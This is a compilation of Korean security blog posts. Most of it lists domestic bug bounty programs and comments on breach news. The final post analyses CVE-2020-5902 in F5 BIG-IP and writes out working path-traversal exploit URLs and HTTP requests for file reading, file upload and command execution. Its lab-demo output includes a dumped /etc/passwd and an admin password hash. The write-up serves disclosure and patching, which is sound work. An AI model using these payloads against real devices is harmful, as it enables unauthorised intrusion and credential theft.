Blog

5월에는 해외 소식이지만 반가운 뉴스가 하나 있네요. 美 법무부, 윤리적 해커 컴퓨터 사기·악용으로 기소 안 한다미국 법무부에서 개인 프라이버시 보호와 사이버 보안 향상의 목적을 갖고 행하는 선의의 보안 연구는 더 이상 기소 대상이 아님을 공식적으로 밝혔다고 합니다. 다만 보안 연구를 내세워 개인이나 기업에 피해를 입힌 경우에는 선의의 보안 연구에 해당되지 않는다고 하니 버그바운티를 하시는 보안연구원분들은 룰을 숙지하고 정확히 준수하여 괜히 법적 분쟁에 휘말리지 않도록 해야겠습니다. 지난 달 국내 버그바운티 업계에서는 해킹존에서 4월말 오픈되어 운영되던 한 건의 프로그램이 조기 종료되는 해프닝이 있었습니다. 그 외 흥미로웠던 뉴스는 중소기업 보안 강화를 위한 무료 컨설팅 서비스 "화이트햇 투게더"를 KISA와 CJ올리브네트웍스, 그리고 파인더갭에서 시행한다는 것이었습니다. 물론 버그바운티 홍보 목적도 있겠지만 중소기업 거래처를 통해 대기업의 보안이 뚫린 사건이 다수 있었습니다. 대기업에 비해 상대적으로 보안에 투자하기 힘든, 그래서 더욱 해킹 공격 위험에 노출되는 중소기업에 관심을 갖고 보안 강화 서비스를 추진하는 것은 분명 긍정적인 모습이네요. 파인더갭이 무엇인가 했더니 해킹존의 버그바운티플랫폼 명칭이 "파인더갭"으로 곧 변경된다고 합니다. 암튼 상대적으로 조용하게 지난 한 달이 지나온 것 같습니다. 딱히 전할 소식도 없고 하니 바로 6월에 유효한 버그바운티 프로그램을 보시죠.2022년 6월 국내 버그바운티 프로그램※ 소개되는 버그바운티 프로그램은 프로그램 시작일과 프로그램 시행 기간을 고려하여 선정됩니다. "신규"는 프로그램 시작일을 기준으로 당월에 새롭게 시작된 프로그램을 뜻하며, "기존"은 프로그램을 시행한지 오래되었더라도 글 작성 시점 기준으로 12개월 이내에 시작되고 시행기간이 유효한 프로그램을 의미합니다. ■ 신규 프로그램: 0건■ 기존 프로그램: 9건BIFROST제공 플랫폼: 패치데이기간: 2022년 2월 7일 - 2023년 2월 7일  최대 포상금: 50,000,000원타겟 시스템 유형: BiFi, BiFi X, BiFi BTC Extension 스마트 컨트랙트의 최신버전 소스코드프로그램 URL: https://patchday.io/bifrost-pilab/bifrostKlaytn Blockchain제공 플랫폼: 패치데이기간: 2022년 1월 12일 - 2023년 1월 12일  최대 포상금: 50,000,000원타겟 시스템 유형: Klaytn 노드 및 스마트 컨트랙트의 소스코드, 블록체인 노드프로그램 URL: https://patchday.io/klaytn/klaytn-blockchainCodeEngn 대표 홈페이지제공 플랫폼: 버그캠프기간: 2021년 6월 10일 - 최대 포상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4d39f5f7058e3a6089a17e1beae024ab 한국CISSP협회 대표 홈페이지제공 플랫폼: 버그캠프기간: 2021년 6월 7일 -최대 포상금: 100,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4ca1fd4c425ccca6ba9d90911a5dd908Remote Browser제공 플랫폼: 버그캠프기간: 2021년 7월 21일 -최대 포상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/475e65db7e2b11c68ac1d7aeeea1bae2Webhacking.kr제공 플랫폼: 버그캠프기간: 2021년 8월 2일 -최대 포상금: 1,500,000원 타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/441035cefaf0279ab99189ea3433443dNaver Whale제공 플랫폼: 패치데이기간: 2021년 10월 25일 - 2022년 10월 25일최대 포상금: USD $7,500타겟 시스템 유형: 소프트웨어(네이버 웨일브라우저)프로그램 URL: https://patchday.io/naver/naver-whalePatchDay제공 플랫폼: 패치데이기간: 2021년 10월 5일 - 2022년 10월 5일 최대 포상금: 2,000,000원타겟 시스템 유형: 웹프로그램 URL: https://patchday.io/theori/patchday/Dreamhack제공 플랫폼: 패치데이기간: 2021년 10월 5일 - 2022년 10월 5일최대 포상금: 2,000,000원타겟 시스템 유형: 웹프로그램 URL: https://patchday.io/theori/dreamhack

해킹 사건/사고는 비일비재하게 일어나고 있지만 11월에 관심을 끌었던 사고가 몇 개 있었습니다.하나는 우리나라 월패드 업계의 보안 수준을 여실히 보여주는 사건입니다. 기사를 접하신 분들은 짐작하셨을 것입니다. 바로 국내 아파트 월패드 해킹 사건입니다. 누구에게나 가장 프라이빗하고 평안한 공간이어야 하는 집이 무방비로 뚫려버려 우리나라 국민들이 졸지에 트루먼쇼의 주인공이 되어 버렸습니다. 국내 아파트 월패드 해킹 영상정부에서는 월패드 업계와 4년 전부터 망분리를 포함한 '지능형 홈네트워크 설비 설치 및 기술기준'의 개정을 시도해오고 있었던 모양이나 비용 증가를 이유로 월패드 업계는 이에 반발하면서 이도저도 못하고 있었던 상황이었나보네요. 홈 네트워크와 같은 사물인터넷(IoT)에는 보안이 매우 중요한 절대적 가치라는 사실을 그들도 매우 잘 알텐데 왜 꼭 사고가 터져야만 움직일까요? 진상을 더 조사해봐야겠지만 만일 해킹 사실이 진실이라면 본인들 잇속 챙기느라 지켜져야할 국민의 사생활을 내패대기 치고 해커의 손에 넘겨준 관련자들에 대해서는 엄중히 책임을 물어야 할텐데요. 정말 울화가 치밀어 오르네요. 전국 아파트 CCTV 해킹, 다크웹서 800만원에 팔린다'국내 월패드 해킹 아파트 명단' 떠돌아…알몸·성관계 모습 유출 우려아파트 사생활 영상 유출 논란…정부, 월패드 망분리 의무화 재추진골드스푼(금수저) 앱 해킹 사건도 있었습니다.한 20대 해커가 금수저들만 가입이 가능하다는 골드스푼 앱을 해킹하고 여성 회원의 정보를 유출한 사건이 있었습니다. 기사를 보기 전까진 이런 앱이 있다는 사실도 몰랐네요. 금수저가 아니니 당연히 모를 수밖에 없겠죠?골드스푼 가입 기준 (골드스푼 홈페이지 캡쳐)아무튼 해킹을 통해 빼낸 정보를 이용해 업체에 25억의 가상화폐를 요구한 해커... 모쪼록 죄값을 다 치르고 모든 기술은 선행에 사용할 때 비로소 그 가치가 빛을 발한다는 걸 깨닫고 반성하길 바랍니다. 그나저나 범행을 저지른 해커는 IT 개발자이고 골드스푼 앱에 회원으로 가입이 되어있었다고 하는데요. 개발자인 이 해커는 도대체 어떻게 골드스푼에 가입이 가능했을지 의문이었습니다. 네카라쿠배로 인해 요즘 개발자 연봉이 예전보다 나아졌다고 하는데 실력있는 개발자라 연봉을 많이 받는 걸까요? 아니면 부모님이 재력가였을까요? 아니면 가입마저도 해킹을 통해 한 걸까요? ‘상위 1% 데이팅앱’ 골드스푼 해킹한 IT 개발자 검거'금수저만 가입' 데이팅앱 회원정보 몰래 빼낸 해커의 반전 정체잠시 눈을 돌려 해외의 버그바운티 소식을 봅시다. 역시 안타까운 소식이 있었습니다. 마이크로소프트사가 버그바운티 포상금 액수를 줄인 것에 불만을 품은 한 버그헌터가 윈도우11, 윈도우10 등에서 발견된 제로데이 로컬 권한상승 취약점을 공개한 사실이 있었습니다. 마이크로소프트사의 이같은 결정은 많은 버그 헌터들 사이에 불만이라고 하네요. 그렇다고 제로데이 취약점 공개를 하다니... 흠.. 아무튼 구글이나 GitLab과 같은 회사가 점진적으로 버그바운티 포상금을 늘려가고 있는 사실과는 상당히 대조적입니다. New Windows zero-day with public exploit lets you become an admin2021년 12월 국내 버그바운티 프로그램※ 소개되는 버그바운티 프로그램은 프로그램 시작일과 프로그램 시행 기간을 고려하여 선정됩니다. "신규"는 프로그램 시작일을 기준으로 당월에 새롭게 시작된 프로그램을 뜻하며, "기존"은 프로그램을 시행한지 오래되었더라도 글 작성 시점 기준으로 12개월 이내에 시작되고 시행기간이 유효한 프로그램을 의미합니다. ■ 신규 프로그램: 3건Samsung TV App 관리를 위한 Seller Office 웹사이트제공 플랫폼: 해킹존기간: 2021년 11월 17일 - 2021년 12월 31일최대 현상금: 20,000,000원타겟 시스템 유형: 웹프로그램 URL: https://hackingzone.net/ProgramDetail/39수산아이엔티제공 플랫폼: 버그캠프기간: 2021년 10월 27일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4a35dad2cc737abcb5935dfd67c15759스마트 안심케어제공 플랫폼: 버그캠프기간: 2021년 11월 22일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/49b1cee7bb158f4ea9ebe4f7e74739e3■ 기존 프로그램: 13건엔큐리티제공 플랫폼: 버그캠프기간: 2021년 10월 12일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4be6ca31e4e7777e989d13efcf858c13(주)내스타일제공 플랫폼: 버그캠프기간: 2021년 10월 13일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/42f84873c958644cb121e2a5af0d9457TARGOS제공 플랫폼: 버그캠프기간: 2021년 10월 19일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/42a3639e491c069da8be40a8d15df4f5찜 어플리케이션제공 플랫폼: 버그캠프기간: 2021년 10월 24일 - 최대 현상금: 0원타겟 시스템 유형: 모바일프로그램 URL: https://bugcamp.io/programs/48059806ce94fc0184b9d61d491de51c주식회사 스패로우제공 플랫폼: 버그캠프기간: 2021년 10월 25일 - 최대 현상금: 0원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/49e3c23aa416ca8aa6b21fdc0b933a3eCodeEngn제공 플랫폼: 버그캠프기간: 2021년 6월 10일 - 최대 현상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4d39f5f7058e3a6089a17e1beae024ab 한국CISSP협회 대표홈페이지제공 플랫폼: 버그캠프기간: 2021년 6월 7일 -최대 현상금: 100,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4ca1fd4c425ccca6ba9d90911a5dd908Remote Browser제공 플랫폼: 버그캠프기간: 2021년 7월 21일 -최대 현상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/475e65db7e2b11c68ac1d7aeeea1bae2Webhacking.kr제공 플랫폼: 버그캠프기간: 2021년 8월 2일 부터최대 현상금: 1,500,000원 타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/441035cefaf0279ab99189ea3433443dNaver Whale제공 플랫폼: 패치데이기간: 2021년 10월 25일 - 최대 현상금: USD $7,500타겟 시스템 유형: 소프트웨어(네이버 웨일브라우저)프로그램 URL: https://patchday.io/naver/naver-whalePatchDay제공 플랫폼: 패치데이기간: 2021년 10월 5일 - 최대 현상금: 2,000,000원타겟 시스템 유형: 웹프로그램 URL: https://patchday.io/theori/patchday/Dreamhack제공 플랫폼: 패치데이기간: 2021년 10월 5일 - 최대 현상금: 2,000,000원타겟 시스템 유형: 웹프로그램 URL: https://patchday.io/theori/dreamhack

9월에 흥미를 끈 버그바운티 관련 기사는 애플 버그바운티 프로그램에 대한 보안연구원들의 불만과 비난에 관한 기사였습니다.Security Researchers Unhappy With Apple's Bug Bounty Program“The house always wins”: Another criticism of Apple’s bug bounty program기사에 따르면 애플은 보안연구원과의 의사소통을 기피하며 보고된 버그를 패치하는데 늑장을 부릴 뿐만 아니라 버그에 대한 보상도 없다고 비난했습니다. 2020년 한해 동안 애플이 버그바운티를 통해 지급된 보상금 액수(370만 달러)가 마이크로소프트(1360만 달러)나 구글(670만 달러)과 비교해 현저히 낮았습니다. 결국 애플의 버그바운티는 보안연구원이 기피하는 프로그램으로 전락하고 말았고, 발견한 애플의 버그는 애플에 보고하기보다는 다른 경로로 판매되었습니다. 애플의 태도가 개선되지 않는다면 애플은 취약점 투성이인 아이폰을 고객에게 판매하고 이는 보안사고로 이어져 더 큰 비용을 지불해야 할 수도 있습니다. 그나저나 보안연구원 입장에서 의사소통이 잘 안되는 것만 해도 심각하다고 여길텐데 가장 중요한 금전적 보상도 차일피일 미루어왔다니 보안연구원이 화가 날만 합니다. 아무튼 이런 해외의 사례를 반면교사로 삼아 국내에서 버그바운티를 시행하고 있거나 앞으로 시행할 기업들은 같은 실수를 범하지 않기를 바랍니다.2021년 10월 국내 버그바운티 프로그램올해 7월경 민간에서 해킹존, 버그캠프 등의 국내 버그바운티 플랫폼을 출시해 서비스를 시작했고, 이에 우리는 국내 버그바운티 프로그램을 소개하기 위해 빅샷 코너를 만들었습니다. 지금 읽고 계신 이 글은 빅샷 코너의 네 번째 글임에도 불구하고 매우 매우 매우 아쉽게도 벌써부터 소개해드릴 수 있는 국내 신규 버그바운티 프로그램이 고갈되어 버렸습니다. 아직 버그바운티에 대한 국내 기업들의 낮은 인지도와 부정적 인식, 기타 여러 요인들로 인한 상황이라 여기며 이런 어려운 상황 속에서도 버그바운티 플랫폼을 서비스하며 국내 기업들의 참여를 이끌어내려고 노력하시는 분들의 노고에 감사드려야 할 것 같습니다. 속도는 좀 느리더라도 프로그램 오너, 소비자, 보안연구원 모두가 윈윈할 수 있는 건전한 버그바운티 문화가 국내에 정착되기를 기대해봅니다. 소개되는 버그바운티 프로그램은 프로그램 시작일과 프로그램 시행 기간을 고려하여 선정됩니다. 이번 글부터는 신규 프로그램과 기존 프로그램으로 구분되어 소개해드릴 예정이며, "신규"는 프로그램 시작일을 기준으로 당월에 새롭게 시작된 프로그램을 뜻하며, "기존"은 프로그램을 시행한지 오래되었더라도 글 작성 시점 기준으로 12개월 이내에 시작되고 시행기간이 유효한 프로그램을 의미합니다. ■ 신규 프로그램없음■ 기존 프로그램CodeEngn제공 플랫폼: 버그캠프기간: 2021년 6월 10일 - 최대 현상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4d39f5f7058e3a6089a17e1beae024ab 한국CISSP협회 대표홈페이지제공 플랫폼: 버그캠프기간: 2021년 6월 7일 -최대 현상금: 100,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/4ca1fd4c425ccca6ba9d90911a5dd908Wargame.kr제공 플랫폼: 버그캠프기간: 2021년 7월 19일 -최대 현상금: 1,000,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/460a759aa8747cacbe5f05028f451441Remote Browser제공 플랫폼: 버그캠프기간: 2021년 7월 21일 -최대 현상금: 500,000원타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/475e65db7e2b11c68ac1d7aeeea1bae2Webhacking.kr제공 플랫폼: 버그캠프기간: 2021년 8월 2일 부터최대 현상금: 1,500,000원 타겟 시스템 유형: 웹프로그램 URL: https://bugcamp.io/programs/441035cefaf0279ab99189ea3433443d모꼬지심제공 플랫폼: 제로웨일기간: 2021년 4월 9일 - 2021년 12월 31일 최대 현상금: 700,000원타겟 시스템 유형: 웹프로그램 URL: https://zerowhale.io/mokojisim 

지난 주에 Positive Technologies사의 보안 연구원인 Mikhail Klyuchnikov에 의해 F5 BIG-IP 애플리케이션 보안 서버의 설정 유틸리티인 TMUI(Traffic Management User Interface)에 존재하는 RCE 취약점이 공개되었습니다. Mikhail Klyuchnikov 트윗:My F5 BIG-IP Unauth Remote Command Execution (CVE-2020-5902). Please update your software.https://t.co/l8KpYJ9YvH— n1✴️ (@__mn1__) July 2, 2020Mikhail Klyuchnikov 연구원은 취약점을 공개하면서 아래와 같이 밝혔습니다.“이 취약점을 악용함으로써 BIG-IP 설정 유틸리티에 접근할 수 있는 원격 공격자는 인증없이 원격 코드 실행 (RCE)을 수행할 수 있습니다. 공격자는 파일 생성 및 삭제, 서비스 비활성화, 정보 탈취 및 임의의 시스템 명령과 Java 코드를 실행하고, 시스템을 완전히 손상시키며, 내부 네트워크로 공격을 확장할 수 있는 추가적인 대상을 탐색할 수 있습니다. 이 경우 RCE는 디렉토리 탐색을 허용하는 것과 같은 여러 구성 요소의 보안 결함으로 인해 발생합니다. 이는 F5 BIG-IP 웹 인터페이스가 Shodan과 같은 검색 엔진에 노출된 회사에 특히 위험합니다. 다행히도이 제품을 사용하는 대부분의 회사는 인터넷에서 인터페이스에 액세스 할 수 없습니다. "이 글을 작성하는 시점 기준으로 Shodan에서 확인해 본 결과, 약 8,400여개가 넘는 취약한 호스트가 검색되었으며, 3,012개의 서버가 취약한 것으로 나타났다고 합니다. 한국은 미국, 중국, 대만에 이어 4위로 약 200여대가 노출되어 있는 것으로 나타나네요.Shodan 검색 결과Bad Packets 트윗:Our latest CVE-2020-5902 scans have identified 3,012 vulnerable F5 hosts worldwide.Bad Packets vulnerability scan results are freely available for authorized government CERT, CSIRT, and ISAC teams.Submit request here: https://t.co/0eV9Go1Fsw https://t.co/Sh4lAHpQVn— Bad Packets (@bad_packets) July 7, 2020또한, NCC Group에 의하면 취약한 호스트에서 "web.xml"이나 "/etc/hosts" 파일을 캡쳐하는 등 실제 스캔 및 공격이 감지되고 있다고 하며, 버그 바운티 헌터 및 공격자들에게 엄청나게 매력적인 취약점인지라, 이 취약점이 공개된 이후 너도 나도 할 것 없이 공략하고 있나 봅니다.트위터에는 이런 짤도 등장했네요. 취약한 것으로 알려진 제품 및 버전아래의 취약한 제품을 사용하고 있다면 F5의 보안 권고에 따라 최신 릴리즈로 업그레이드를 해야 합니다.제품버전BIG IP(LTM, AAM, AFM, Analytics, APM,ASM, DNS, FPS, GTM, Link Controller, PEM)15.1.0~15.0.0, 14.1.0~14.1.2, 13.1.0~13.1.3, 12.1.0~12.1.5, 11.6.1~11.6.5분석CVE-2020-5902 취약점은 취약한 F5 BIG-IP를 사용하는 서버의 설정 인터페이스인 TMUI에 대한 접근이 BIG-IP 관리 포트 및 Self IP에 의해 노출될 경우 특수하게 조작된 HTTP 요청을 보내는 방식으로 악용될 수 있습니다. Self IP란? VLAN의 호스트에 접근하기 위한 BIG-IP 시스템의 IP주소. (F5 기술문서 참조)여기서, "특수하게 조작된 HTTP 요청"이란 Mikhail Klyuchnikov 연구원이 밝힌 바와 같이 디렉토리 탐색 취약점에 주로 사용되는 문자열이 핵심이 됩니다. 바로 이겁니다.F5의 보안 권고를 보면 모든 네트워크 인터페이스에서의 보안 조치로 httpd 설정에 아래와 같이 설정을 하라고 권고하고 있습니다. include '<LocationMatch ".*\.\.;.*">Redirect 404 /</LocationMatch>'즉, "*..;" 문자열을 포함하는 모든 URL에 대해 404 에러 페이지로 리디렉션하도록 권장하고 있습니다.추측컨데, /tmui/login.jsp와 같은 URL에서 "..;" 문자열을 통해 상위 디렉토리로 이동시킨 후 인증이 필요한 페이지로 접근 시 인증되지 않은 사용자도 접근이 가능한 것으로 보입니다. 일종의 인증 우회 취약점이라고 볼 수도 있겠네요. 정확한 원인은 좀 더 분석을 해봐야 할 것 같네요.아무튼 이 취약점을 악용하면 로컬 파일 포함(LFI)과 파일 업로드, 원격 코드 실행(RCE)이 가능한 엔드포인트로 접근이 가능하게 됩니다. 해당 엔드포인트는 아래와 같습니다.로컬 파일 포함(LFI)https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdhttps://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hostshttps://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.licensehttps://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf파일 업로드https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp원격 코드 실행(RCE)https://TARGET/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin(LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM데모F5 BIG-IP Virtual Edition의 평가판 중 BIG-IP 15.1.0.2-0.0.9 LTM을 다운로드 받아서 직접 테스트해보았습니다.아래는 설정을 마친 후 BIG-IP의 서버로 접근 시 처음 나타나는 TMUI의 로그인 페이지입니다.이 로그인 페이지의 URL 뒤에 각각의 문자열을 추가하여 요청을 해보겠습니다.디렉토리 리스트 조회[요청]GET /tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ HTTP/1.1 Host: 192.168.0.21 Connection: close ...[응답]HTTP/1.1 200 OK Date: Tue, 07 Jul 2020 15:55:29 GMT Server: Apache ... {"output":{"dir":"www","children":[{"dir":"avr","children":[{"file":".htaccess"},{"dir":"api","children":[{"file":"cli.php"},{"file":"device-groups.php"},{"file":"dos-profiles.php"},{"file":"exportPDF.php"},{"file":"get-dos-attacks.php"},{"file":"monp2rjd.php"}]},{"dir":"app","children":[{"dir":"dos","children":[{"dir":"images","children":[{"file":"ajax-loader.blue.gif"},{"file":"ajax-loader.gif"}]},{"dir":"js","children":[{"dir":"charts","children":[{"dir":"AttacksChart","children":[{"file":"attacksChart.css"},{"file":"attacksChart.directive.ts"},{"file":"attacksChart.view.html"}]},{"dir":"DimensionBreakdownChart","children":[{"file":"dimensionBreakdownChart.css"},{"file":"dimensionBreakdownChart.directive.ts"},{"file":"dimensionBreakdownChart.view.html"}]},{"dir":"DimensionStatusChart","children":[{"file":"dimensionStatusChart.css"},{"file":"dimensionStatusChart.html"},{"file":"dimensionStatusChart.ts"}]},{"dir":"GeoMapChart","children":[{"file":"geoMapChart.css"},{"file":"geoMapChart.directive.ts"},{"file":"geoMapChart.view.html"},{"file":"topojson.d.ts"}]},{"file":"charts.ts"}]},...로컬 파일 포함(LFI)[요청]GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: 192.168.0.21 Connection: close ... [응답]HTTP/1.1 200 OK Date: Tue, 07 Jul 2020 15:57:35 GMT Server: Apache ... {"output":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/sbin\/nologin\nsupport:x:0:0:support:\/root:\/bin\/bash\nf5emsvr:x:975:975:F5 EM Service Account:\/root:\/bin\/false\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\n"}파일 업로드[요청]POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1 Host: 192.168.0.21 Connection: close ... fileName=/tmp/bigip-vuln.txt&content=bugbountyclub[응답]HTTP/1.1 200 OK Date: Tue, 07 Jul 2020 16:00:02 GMT Server: Apache ...LFI 취약점에 사용한 엔드포인트를 통해 bigip-vuln.txt 파일이 정상적으로 생성되었는지 확인해보니 아래와 같이 성공적으로 파일이 만들어졌음을 확인할 수 있습니다.원격 코드 실행(RCE)F5 BIG-IP는 TMSH이라고 하는 CLI 환경을 제공합니다. TMSH에서 사용할 수 있는 명령어는 여기를 참고하세요.[요청]GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1 Host: 192.168.0.21 Connection: close ...[응답]HTTP/1.1 200 OK Date: Wed, 08 Jul 2020 09:54:45 GMT Server: Apache ... {"error":"","output":"auth user admin {\n description \"Admin User\"\n encrypted-password $6$NrcclyHd$bOsfvQb75GrwujNy81cQ0JYKLBFmPT27Uul4nJTK2\/Q1Y87Im990.PO1OFuSF0.MZmFPCNECR83hmWjgNpg9u0\n partition Common\n partition-access {\n all-partitions {\n role admin\n }\n }\n shell none\n}\n"} 보완 대책F5의 보안 권고를 참고하시기 바랍니다.다만, 취약한 엔드포인트로 접근을 막더라도 인증된 사용자는 여전히 접근하여 명령 실행이 가능한 관계로, 관리 계정의 패스워드 강화 등의 조치가 필요할 것 같습니다.참고 문헌https://www.tenable.com/blog/cve-2020-5902-critical-vulnerability-in-f5-big-ip-traffic-management-user-interface-tmuihttps://support.f5.com/csp/article/K52145254https://github.com/yassineaboukir/CVE-2020-5902https://github.com/jas502n/CVE-2020-5902